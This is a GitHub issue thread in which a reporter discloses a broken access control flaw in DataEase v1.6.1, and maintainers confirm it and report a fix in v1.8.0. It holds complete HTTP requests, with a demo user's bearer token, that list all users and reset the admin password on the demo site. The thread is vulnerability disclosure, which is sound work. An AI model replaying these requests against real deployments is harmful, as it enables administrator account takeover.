### ISSUE TITLE
Security Issues[Bug]

### ISSUE THREAD

**Issue by espduino** [dataease/dataease#1618]
**DataEase 版本**
v1.6.1

**浏览器版本**
 Chrome 96.0.4664.110

**Bug 描述**
I found an Broken Access Control vulnerability
An authenticated user can access information about all users and change admin password

**Bug 重现步骤(有截图更好)**
1. use demo login
2. this api access information about all users
···
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10;  Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13

{"orders":[]}
···
![image](https://user-images.githubusercontent.com/57093419/148886458-da337e0a-b01c-46c0-8194-0ff38689fa0a.png)

3. this api change admin password
···
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10;  Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36

{"userId":1,"newPassword":"SECtest"}
···
![image](https://user-images.githubusercontent.com/57093419/148886630-b685cd7d-9778-428f-b943-573984164a3d.png)
now you can use admin/SECtest login

![image](https://user-images.githubusercontent.com/57093419/148886773-30c3820b-b42c-43d8-8bbc-39a84b87d0f2.png)

**Comment by xuwei-fit2cloud** [comment]
感谢反馈，确实是有这个问题，我们尽快处理一下

**Comment by BBchicken-9527** [comment]
感谢反馈，这个问题将会在下个大版本中修复

**Comment by xuwei-fit2cloud** [comment]
v1.8.0 版本已修复，请关注新版本。
